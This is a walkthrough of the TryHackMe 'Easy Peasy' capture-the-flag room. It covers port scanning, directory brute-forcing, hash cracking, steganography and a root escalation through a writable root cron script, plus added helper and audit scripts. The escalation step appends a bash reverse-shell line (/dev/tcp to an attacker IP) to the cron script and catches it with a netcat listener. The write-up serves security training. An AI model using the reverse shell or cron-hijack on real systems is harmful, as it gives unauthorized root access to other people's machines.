# EasyPeasy

Try this challenge in [TryHackMe: **Easy Peasy**](https://tryhackme.com/r/room/easypeasyctf)

> I tried this easy CTF and below is my thought process on how I answered the questions and some notes for future reference. I got some hints from this Medium walkthrough: [TryHackMe: Easy Peasy Write-up by Kevin De Vijlder](https://medium.com/@kevin.de.vijlder/tryhackme-easy-peasy-write-up-b148ebed3c7e)

## Task 1: Enumeration through Nmap

### 1.1 How many ports are open?

Let's run an nmap scan to find the open ports on the IP assigned to us. Just **replace 10.10.X.X with the IP given to you**.

```bash
nmap -sT -p 1-65535 10.10.X.X
```

{% hint style="info" %}
**`-sT`** (TCP connect scan) completes the full handshake, so it works without root. **`-p 1-65535`** (equivalently `-p-`) scans every TCP port instead of nmap's default top 1000; that is what turns up the non-standard ports 6498 and 65524.
{% endhint %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F8kTQn6724nd7HvMFOUhq%2Fc1e642f4-59bc-4cd5-abde-0684fce7cd51.png?alt=media&#x26;token=18d5307f-2ea2-49d3-a710-e8e151461c70" alt="" width="563"><figcaption></figcaption></figure>

*To answer the next two questions*, we run a second nmap scan with version detection (`-sV`) against only the three ports found open:

### 1.2 What is the version of nginx?

### 1.3 What is running on the highest port?

```bash
nmap -p80,6498,65524 10.10.X.X -sV
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F0PSmSlMu7DB451wLJrAu%2Fbca6faed-0528-472a-bf37-cec1d2ae95ae.png?alt=media&#x26;token=b4eda67f-de2d-4883-a352-77ef8858a30f" alt="" width="563"><figcaption></figcaption></figure>
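As an added example (not from the original write-up): the two scans above are really one workflow, a full sweep followed by version detection on just the ports that were open. The script below automates it; `extract_open_ports` parses nmap's grepable output (`-oG`), and the grepable text at the bottom is a constructed sample, not real scan output, so the parser can be checked offline. It assumes `nmap` is on PATH and that the target is the room IP.

```bash
#!/usr/bin/env bash
# Two-stage nmap workflow: sweep every TCP port first, then fingerprint only the
# ports that came back open. extract_open_ports parses nmap's grepable output (-oG),
# which is the easiest nmap format to post-process from a shell.

extract_open_ports() {
  # $1: path to an -oG file. Port entries look like 80/open/tcp//http///
  # Output: comma-separated, numerically sorted list, e.g. 80,6498,65524
  grep -o '[0-9][0-9]*/open/' "$1" | cut -d/ -f1 | sort -n -u | tr '\n' ',' | sed 's/,$//'
}

two_stage_scan() {
  # $1: target IP or hostname (the 10.10.X.X from the room)
  target=$1
  gnmap=$(mktemp)
  # Stage 1: -sT connect scan needs no root; -p- is every port 1-65535;
  # -T4 is fine on a lab VPN. Output goes to a grepable file for parsing.
  nmap -sT -p- -T4 -oG "$gnmap" "$target" >/dev/null
  ports=$(extract_open_ports "$gnmap")
  rm -f "$gnmap"
  if [ -z "$ports" ]; then
    echo "no open TCP ports found on $target" >&2
    return 1
  fi
  # Stage 2: version detection only where it matters. This answers both
  # "what version of nginx" and "what runs on the highest port" in one run.
  nmap -sV -p "$ports" "$target"
}

# Constructed sample of -oG output (not real scan data) so the parser runs offline
SAMPLE_GNMAP=$(mktemp)
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -sT -p- -oG - 10.10.X.X
Host: 10.10.X.X ()  Status: Up
Host: 10.10.X.X ()  Ports: 80/open/tcp//http///, 6498/open/tcp//ssh///, 65524/open/tcp//http///  Ignored State: closed (65532)
# Nmap done
EOF
extract_open_ports "$SAMPLE_GNMAP"   # prints 80,6498,65524
# Real run against the room: two_stage_scan 10.10.X.X
```

Keeping the sweep and the version scan separate matters on larger targets: `-sV` probes every port it is given, so running it over all 65535 ports wastes time and noise, while running it over the parsed list costs a few seconds.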

## Task 2: Compromising the machine

### 2.1 Using GoBuster, find flag 1.

Run gobuster for **<http://10.10.X.X/>**

{% code overflow="wrap" %}

```bash
gobuster dir -u http://10.10.X.X/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```

{% endcode %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FCNLf7gjXdcKFdWRVpaZL%2FScreenshot_2024-06-22_at_12.41.14.png?alt=media&#x26;token=48cf3c46-9795-4022-bef2-0fc025776fd9" alt="" width="563"><figcaption></figcaption></figure>

gobuster reports a `/hidden` directory. gobuster does not recurse into what it finds, so run it again with **<http://10.10.X.X/hidden>** as the base URL:

{% code overflow="wrap" %}

```bash
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.X.X/hidden
```

{% endcode %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FXVojeGSac8t3MxC9Or3M%2FScreenshot_2024-06-22_at_12.41.52.png?alt=media&#x26;token=7aafa7c1-daa7-48a4-ae6d-238fb311c396" alt="" width="563"><figcaption></figcaption></figure>
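The re-run on `/hidden` above is the manual version of recursion. The wrapper below, an added example that is not part of the write-up, does that re-run automatically to a fixed depth; `extract_dirs` pulls directory hits (301/302 to the trailing-slash form) out of gobuster's output file. The gobuster output at the bottom is a constructed sample, not a real scan. It assumes `gobuster` is on PATH and the SecLists wordlist path used on this page.

```bash
#!/usr/bin/env bash
# Recursive directory brute-force around gobuster. gobuster dir does not descend into
# directories it discovers, so each hit is fed back in as a new base URL.

WORDLIST=${WORDLIST:-/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt}

extract_dirs() {
  # $1: gobuster output file (-o). A directory hit is a redirect to the
  # trailing-slash form of the path, e.g.:
  # /hidden               (Status: 301) [Size: 178] [--> http://10.10.X.X/hidden/]
  grep -E '^/[^ ]+ +\(Status: 30[12]\)' "$1" | awk '{ print $1 }' | sort -u
}

brute_recursive() {
  # $1: base URL with no trailing slash; $2: how many levels deeper to go.
  # local keeps each recursion level's own base/out while the loop below continues.
  local base=$1 depth=$2 out
  out=$(mktemp)
  gobuster dir -q -u "$base/" -w "$WORDLIST" -o "$out" >/dev/null
  echo "== $base/"
  cat "$out"
  if [ "$depth" -gt 0 ]; then
    extract_dirs "$out" | while read -r dir; do
      brute_recursive "$base$dir" $((depth - 1))
    done
  fi
  rm -f "$out"
}

# Constructed sample of gobuster output (not a real scan) to exercise the parser offline
SAMPLE_OUT=$(mktemp)
cat > "$SAMPLE_OUT" <<'EOF'
/hidden               (Status: 301) [Size: 178] [--> http://10.10.X.X/hidden/]
/index.html           (Status: 200) [Size: 612]
/robots.txt           (Status: 200) [Size: 46]
EOF
extract_dirs "$SAMPLE_OUT"   # prints /hidden
# Real run against the room: brute_recursive http://10.10.X.X 2
```

A depth limit is deliberate: on a site with many directories an unbounded recursion is both slow and loud, and on this box depth 2 is enough to reach `/hidden/whatever`.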

Go to **<http://10.10.X.X/hidden/whatever>**

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FCq9gqyBuE3fkYfQEquzS%2FUntitled.png?alt=media&#x26;token=ff6080d4-29e5-4aa5-a45f-0a2182eebe9d" alt="" width="548"><figcaption></figcaption></figure>

Copy the hash hidden on the page.

A hash is a one-way function, so it is not decrypted but cracked or looked up. For a quick result, paste it into a lookup service such as [**https://hashes.com/en/decrypt/hash**](https://hashes.com/en/decrypt/hash), which matches it against tables of precomputed hashes (fine for a lab box; do not do this with hashes from a real engagement).

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FWNCTEo1pddzgdLc0Yj7F%2F2_(3).png?alt=media&#x26;token=d2627a79-0d9c-4c67-b438-0b25e4514edb" alt=""><figcaption></figcaption></figure>

### 2.2 Further enumerate the machine, what is flag 2?

Run gobuster for **<http://10.10.X.X:65524>**

{% code overflow="wrap" %}

```bash
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.X.X:65524
```

{% endcode %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F6YZaSwuh12QKDzEBjLUC%2FUntitled%201.png?alt=media&#x26;token=207300e7-9ef1-421e-95ea-c1bb8b153de7" alt="" width="543"><figcaption></figcaption></figure>

Check **`10.10.X.X:65524/robots.txt`**

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FFMmAf73q3vqBd695dY2D%2FUntitled%202.png?alt=media&#x26;token=072a5530-35d7-4149-8dd8-618367d8b19c" alt="" width="446"><figcaption></figcaption></figure>

In the `User-Agent` field, there’s a hash

To identify the hash type, use the [hash-identifier](https://github.com/blackploit/hash-identifier) tool (clone the repository first):

{% code lineNumbers="true" %}

```bash
git clone https://github.com/blackploit/hash-identifier
cd hash-identifier
python3 hash-id.py <insert hash here>
```

{% endcode %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FIZn1x6PlUmmGi1KSpm0U%2F2_(2).png?alt=media&#x26;token=9df6ec70-c6b7-4f1f-850f-3f6ba0b06253" alt="" width="563"><figcaption></figcaption></figure>

hash-identifier's top candidate is MD5. Look it up in an online MD5 reverse-lookup service (or crack it locally with john, `--format=raw-md5`, and a wordlist):

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F2bOhRoAI4Ffmxf1gZ2b4%2F2_(1).png?alt=media&#x26;token=cfc11f9a-dc75-4137-8258-f3a1d99d6bf3" alt=""><figcaption></figcaption></figure>

### 2.3 Crack the hash with easypeasy.txt, What is the flag 3?

The nmap scan showed a second web server on port 65524; browse to **`http://10.10.X.X:65524`**

Flag 3 is written in plain sight on the web page

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2Fnvgy18NiV9QgH2JIIRIT%2Fbbdd2a9d-cd2d-425c-b5fd-6a6dc7302894.png?alt=media&#x26;token=bc0cf69d-2cee-4e05-b7e7-84955c1a2066" alt=""><figcaption></figcaption></figure>

### 2.4 What is the hidden directory?

View the page source of **`http://10.10.X.X:65524`**: there is a hidden field containing an encoded string (the question calls it a hash).

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F6Q8j1Xt2BKk5WPG05lsd%2FUntitled%203.png?alt=media&#x26;token=48177697-b758-483a-aa09-56821176d8e8" alt=""><figcaption></figcaption></figure>

We'll use [CyberChef](https://gchq.github.io/CyberChef/) to decode it. It is a Base6X encoding rather than a hash, so it decodes deterministically with no cracking involved: explore the Base6X operations available in CyberChef until the output is readable; the result is the hidden directory name.

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F1vkMuQ050387TViWLmCT%2FUntitled%204.png?alt=media&#x26;token=daca54fd-c020-4aed-bbf5-5345914aa737" alt="" width="552"><figcaption></figcaption></figure>

### 2.5 Using the wordlist that was provided to you in this task crack the hash what is the password?

When you go to the hidden directory, you’ll see a picture

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2Fl3KwdyrucO9tEq7AIap6%2FUntitled%205.png?alt=media&#x26;token=e34558bc-b17f-4950-b0d0-05ed5041b573" alt=""><figcaption></figcaption></figure>

Save the image with its default name

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FyD48djz0yVVXl6lOGrZ7%2FScreenshot_2024-07-19_at_20.36.49.png?alt=media&#x26;token=943acec3-a711-4f87-9586-506a1c23c498" alt="" width="563"><figcaption></figcaption></figure>

We'll use steghide to check whether a message is embedded in the image:

```bash
steghide --extract -sf binarycodepixabay.jpg
```

But a passphrase is needed to decrypt this file

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FlDIeYWLkKKrho6DwFLmT%2FScreenshot_2024-07-19_at_20.52.25.png?alt=media&#x26;token=58798df8-b3bb-4b2a-a36a-aed65047ca77" alt="" width="563"><figcaption></figcaption></figure>

Let's **view the page source** of the image page for clues. It contains a hash.

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FAWG5oo0OyelbBoRftOXN%2FUntitled%206.png?alt=media&#x26;token=5349ea65-e831-4858-a4ad-48f747168fc9" alt=""><figcaption></figcaption></figure>

Save the hash to a file named **hash.txt**

```bash
nano hash.txt
```

To crack it, use **John the Ripper** with the wordlist provided in the task. `--format=gost` tells john to treat the 64-hex-character string as GOST R 34.11-94 rather than SHA-256; john cannot tell the two apart by length, so the format is a guess that is confirmed when the wordlist produces a match.

```bash
sudo /opt/john/john --wordlist=easypeasy.txt --format=gost hash.txt
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F2ZVRRLqS7xBAA7LoZGOQ%2FUntitled%207.png?alt=media&#x26;token=7d323cb3-beed-4773-8856-530e068f5ecd" alt="" width="557"><figcaption></figcaption></figure>
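Both hash steps on this page, the web lookups in 2.1 and 2.2 and the john run just above, can be done without sending anything to a third party. The script below is an added example, not part of the original write-up: it narrows the algorithm by length (the same heuristic hash-identifier applies to unsalted digests) and then checks a wordlist with the coreutils digest tools. The wordlist and target hash at the bottom are constructed, not the room's hash or easypeasy.txt. GOST is not available in coreutils, which is why john with `--format=gost` is the right tool for the flag in 2.5.

```bash
#!/usr/bin/env bash
# Offline hash identification and wordlist cracking. Online lookup services are quick,
# but they keep whatever you submit; for anything that is not a lab box, keep the hash
# and the wordlist on your own machine.

guess_hash_type() {
  # $1: hash string. Unsalted hex digests can only be narrowed by length. 64 hex
  # characters is SHA-256 length but also GOST R 34.11-94 (the --format=gost john run
  # in 2.5) and SHA3-256, so a 64-character hash needs a trial crack under each
  # candidate rather than a single answer.
  h=$1
  case $h in
    *[!0-9a-fA-F]*) echo "not-hex"; return 1 ;;
  esac
  case ${#h} in
    32)  echo md5 ;;
    40)  echo sha1 ;;
    64)  echo "sha256|gost|sha3-256" ;;
    128) echo "sha512|whirlpool" ;;
    *)   echo "unknown(${#h} chars)"; return 1 ;;
  esac
}

hex_digest() {
  # $1: md5|sha1|sha256|sha512 (runs coreutils md5sum, sha1sum, ...), $2: candidate.
  # printf rather than echo, so no trailing newline is hashed by mistake.
  printf '%s' "$2" | "${1}sum" | cut -d' ' -f1
}

crack_with_wordlist() {
  # $1: algorithm, $2: target hash (any case), $3: wordlist, one candidate per line.
  # Prints the matching word and returns 0; returns 1 when the list is exhausted.
  alg=$1
  target=$(printf '%s' "$2" | tr 'A-F' 'a-f')
  while IFS= read -r word || [ -n "$word" ]; do
    if [ "$(hex_digest "$alg" "$word")" = "$target" ]; then
      printf '%s\n' "$word"
      return 0
    fi
  done < "$3"
  return 1
}

# Constructed wordlist and a target hash derived from it (not the room's hash or easypeasy.txt)
SAMPLE_LIST=$(mktemp)
printf '%s\n' password letmein easypeasy hunter2 > "$SAMPLE_LIST"
SAMPLE_HASH=$(hex_digest md5 easypeasy)
guess_hash_type "$SAMPLE_HASH"                         # md5
crack_with_wordlist md5 "$SAMPLE_HASH" "$SAMPLE_LIST"  # easypeasy
```

A shell loop forking `md5sum` per candidate is fine for a CTF-sized wordlist and makes the mechanics visible; for anything larger, john or hashcat do the same comparison millions of times faster and cover formats coreutils lacks.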

### 2.6 What is the password to login to the machine via SSH?

Back in **steghide**, supply the passphrase we just cracked.

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2Fq5DCkf8FANEXgPNuWhQ8%2FScreenshot_2024-07-19_at_21.18.19.png?alt=media&#x26;token=dc19ea84-3371-4666-8f2e-080a1a92ecdb" alt="" width="563"><figcaption></figcaption></figure>

A file **secrettext.txt** is extracted. View its contents:

```bash
cat secrettext.txt
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FM7XhzrLg7oU6Rpr1rpBE%2FUntitled%208.png?alt=media&#x26;token=e3efcf80-7e7b-4113-b7bf-f329bd6d0c27" alt="" width="557"><figcaption></figcaption></figure>

We get a username, **boring**, and a string of binary octets that needs to be decoded (this is an encoding, not encryption, so no key is involved)

Use a Binary to Text converter tool online like this:

<https://www.rapidtables.com/convert/number/binary-to-ascii.html>

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FutYPlBpql2mBPxSRfPCG%2FUntitled%209.png?alt=media&#x26;token=20dd9281-f076-4a21-9f18-bf0bbd4cbb22" alt="" width="417"><figcaption></figcaption></figure>

### 2.7 What is the user flag?

From the nmap scan, SSH is not on the default port 22 but on **port 6498**, so pass it with `-p`:

```bash
ssh boring@10.10.X.X -p 6498
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FIB6vb9wXoeniuysoiPZx%2F2b7f5f73-8e6d-4078-bf21-6367ac3d30a8.png?alt=media&#x26;token=d7e45123-939e-4a13-a01d-1e9bbdff7daa" alt="" width="563"><figcaption></figcaption></figure>

{% code lineNumbers="true" %}

```bash
ls
cat user.txt
```

{% endcode %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FdOOcpMgYcNe6FJR5JMxm%2F9729b116-7274-4d84-9daa-5886a50d4843.png?alt=media&#x26;token=7b66f249-0fc1-488a-a9b5-6b652c3e8c97" alt="" width="563"><figcaption></figcaption></figure>

**From the hint**, we get the term "Rotated", which points to ROT13 (a Caesar shift of 13 places; applying it twice restores the original text). Using CyberChef's ROT13 operation, we decode the flag.

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FlIxhuo0sWfRXGF236eJ8%2FUntitled%2010.png?alt=media&#x26;token=e5879f5e-a38a-43b6-82e2-4ec5f8eac64e" alt="" width="503"><figcaption></figcaption></figure>
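The two conversions done in a browser above, binary to text in 2.6 and ROT13 in 2.7, are easy to do locally and to chain in a pipeline. The script below is an added example, not part of the write-up; the binary string and the ROT13 text at the bottom are constructed samples, not the room's real secrettext.txt or flag.

```bash
#!/usr/bin/env bash
# Offline decoders for the two encodings met on this box. Nothing leaves the machine,
# and both functions read stdin so they compose with cat/cut/grep.

bin2ascii() {
  # Reads whitespace-separated 8-bit groups (e.g. "01101000 01101001") from $1 or
  # stdin and prints the ASCII text. Each group is folded into an integer and emitted
  # through printf's octal escape, so nothing beyond sed and printf is needed.
  if [ $# -gt 0 ]; then set -- "$1"; else set -- "$(cat)"; fi
  for group in $1; do
    n=0
    for bit in $(printf '%s' "$group" | sed 's/./& /g'); do
      case $bit in
        0|1) n=$((n * 2 + bit)) ;;
        *)   echo "bad bit '$bit' in '$group'" >&2; return 1 ;;
      esac
    done
    printf "\\$(printf '%03o' "$n")"
  done
  printf '\n'
}

rot13() {
  # Caesar shift by 13: A-M <-> N-Z (and a-m <-> n-z); everything else is untouched.
  # Because 13 is half the alphabet, rot13 is its own inverse.
  tr 'A-Za-z' 'N-ZA-Mn-za-m'
}

# Constructed sample inputs (not the room's real secrettext.txt or flag)
SAMPLE_BITS='01101000 01100101 01101100 01101100 01101111'
bin2ascii "$SAMPLE_BITS"                 # hello
printf '%s\n' 'synt{rknzcyr}' | rot13    # flag{example}
```

The `tr` one-liner is the whole of ROT13, which is also why "Rotated" is a hint and not a protection: anything that can be undone by a table lookup with no key is encoding, not encryption.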

### 2.8 What is the root flag?

From the room description, we are expected to **escalate privileges through a vulnerable cron job**. Start with the system crontab:

```bash
cat /etc/crontab
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FPQz3HZMGZQ8cvzTXFN2J%2FScreenshot_2024-07-19_at_22.54.18.png?alt=media&#x26;token=2a4aaf01-cd6f-4ad5-ba75-f5422d6ae1f1" alt="" width="563"><figcaption></figcaption></figure>

The crontab runs a script located in **/var/www** as root. List the directory with `-a`, since the script is a dotfile:

{% code lineNumbers="true" %}

```bash
cd /var/www
ls -la
```

{% endcode %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F45Kqirhzy0T3Awvpo1P1%2FScreenshot_2024-07-19_at_22.54.51.png?alt=media&#x26;token=a4f5716f-6e3f-4010-ad5b-bfb1ecc0e29b" alt="" width="563"><figcaption></figcaption></figure>

There is a hidden script **.mysecretcronjob.sh**, which the crontab runs as root. The `ls -la` output is the check that matters: the file is writable by our user (the append further down succeeds), so anything we add to it runs as root on the next cron tick.

```bash
cat .mysecretcronjob.sh
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FOgXxmih2gLaQNVbVJJNC%2FScreenshot_2024-07-19_at_22.55.13.png?alt=media&#x26;token=863a199d-5d49-4a23-b724-baaa5439abfc" alt="" width="563"><figcaption></figcaption></figure>

Start a **netcat listener on our attacking machine**; when cron next runs the modified script as root, it will connect back to us with a root shell.

```bash
nc -lvnp 5556
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FlwslK0BNEp0YRJllHmRK%2FScreenshot_2024-07-19_at_22.56.35.png?alt=media&#x26;token=ff594b64-81ca-45ea-8d98-644993920ea1" alt="" width="563"><figcaption></figcaption></figure>

Let's craft the payload:

Take the bash reverse-shell one-liner from [pentestmonkey's reverse shell cheat sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) and **append it to .mysecretcronjob.sh** (`>>` appends, so the script's original lines stay in place and still run)

```bash
echo "bash -i >& /dev/tcp/10.10.X.X/5556 0>&1" >> .mysecretcronjob.sh
```

*\*Replace 10.10.X.X here with the IP of **your** attacking machine (the VPN address, not the target's) and keep port 5556 matching the listener.*

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FloVm5PbHTfba0Umtvz96%2FScreenshot_2024-07-19_at_22.55.38.png?alt=media&#x26;token=e5d0f957-917b-49f5-b149-1aff5201cf2c" alt=""><figcaption></figcaption></figure>

Now wait for cron to fire; the listener receives a root shell, from which we read the root flag:

{% code lineNumbers="true" %}

```bash
cd /root
ls -la
```

{% endcode %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FNmElCRl8y5kOZwNUP99K%2FScreenshot_2024-07-19_at_22.57.23.png?alt=media&#x26;token=efa50a5b-7c4b-4bfe-a95c-7f25162fdc46" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FeNlDHZ2NlSlGEmXVoubl%2FScreenshot_2024-07-19_at_22.57.45.png?alt=media&#x26;token=d60dab41-5150-4333-a685-fe317cbeb812" alt="" width="563"><figcaption></figcaption></figure>

{% hint style="success" %}
We can see the flag in the **.root.txt** file.
{% endhint %}

```bash
cat .root.txt
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FscwcUv3VC2X8Zvy8JGFT%2FUntitled%2011.png?alt=media&#x26;token=f31786ea-7eff-4171-bcf4-1263808f4f9e" alt="" width="554"><figcaption></figcaption></figure>
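This privilege escalation exists because a root cron job executes a script a normal user can write to. The check below is an added example, not from the write-up: given a crontab in system format it reports every root job whose script is owned by a non-root user or carries a group or world write bit, which is the `ls -la` check from above made systematic. The crontab and scripts are constructed in a temp directory; it assumes GNU stat (Linux). The fix on a real system is `chown root:root` plus `chmod 755` on the script, or not running user-owned scripts from root's crontab at all.

```bash
#!/usr/bin/env bash
# Audit for the weakness this room's privilege escalation relies on: a cron job that
# runs as root but executes a script a low-privileged user can modify.
# Assumes GNU stat (Linux); on BSD/macOS use stat -f '%Su' and stat -f '%Lp' instead.

find_writable_root_jobs() {
  # $1: crontab file with a user field (m h dom mon dow USER command), the format of
  # /etc/crontab and /etc/cron.d/*. Prints "<script> <owner> <mode>" for every root
  # job whose command file is owned by someone else or is group/world writable.
  awk '
    /^[[:space:]]*(#|$)/          { next }   # comments and blank lines
    /^[A-Za-z_][A-Za-z0-9_]*=/    { next }   # SHELL=, PATH=, MAILTO= ...
    $1 ~ /^@/                     { print $2, $3; next }   # @reboot root /path/script
                                  { print $6, $7 }         # first command token only
  ' "$1" | while read -r user script; do
    [ "$user" = root ] || continue
    [ -f "$script" ] || continue        # "cd / && run-parts ..." style entries are skipped
    owner=$(stat -c '%U' "$script")
    mode=$(stat -c '%a' "$script")      # e.g. 755: digits are owner, group, other
    group_w=$(( (mode / 10 % 10) & 2 )) # write bit of the group digit
    other_w=$(( (mode % 10) & 2 ))      # write bit of the other digit
    if [ "$owner" != root ] || [ "$group_w" -ne 0 ] || [ "$other_w" -ne 0 ]; then
      printf '%s %s %s\n' "$script" "$owner" "$mode"
    fi
  done
}

# Constructed sample: a temp directory standing in for /var/www and a fake /etc/crontab
SAMPLE_DIR=$(mktemp -d)
BAD_SCRIPT="$SAMPLE_DIR/.mysecretcronjob.sh"   # root job, world-writable: the room's bug
SAFE_SCRIPT="$SAMPLE_DIR/backup.sh"            # root job, mode 755: reported only if its owner is not root
USER_SCRIPT="$SAMPLE_DIR/userjob.sh"           # writable, but the job runs as boring, not root
printf '#!/bin/bash\nid > /tmp/cronout\n' > "$BAD_SCRIPT"; chmod 666 "$BAD_SCRIPT"
printf '#!/bin/bash\n' > "$SAFE_SCRIPT";                    chmod 755 "$SAFE_SCRIPT"
printf '#!/bin/bash\n' > "$USER_SCRIPT";                    chmod 777 "$USER_SCRIPT"
SAMPLE_CRONTAB="$SAMPLE_DIR/crontab"
cat > "$SAMPLE_CRONTAB" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
* * * * * root $BAD_SCRIPT
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot root $SAFE_SCRIPT
*/5 * * * * boring $USER_SCRIPT
EOF
find_writable_root_jobs "$SAMPLE_CRONTAB"   # reports .mysecretcronjob.sh
```

Run it against `/etc/crontab` and each file in `/etc/cron.d` on a box you are defending; a non-root owner on a root job's script is the exact condition that let `boring` become root here. The check only looks at the first command token, so jobs that wrap the real script in `sh -c` or `bash /path` need a second look by hand.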


